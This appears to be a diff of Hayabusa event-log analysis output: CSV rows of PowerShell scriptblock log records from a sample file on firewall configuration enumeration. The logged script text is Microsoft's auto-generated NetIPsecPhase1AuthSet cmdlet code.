[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmd",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"letization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase1AuthSet'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and 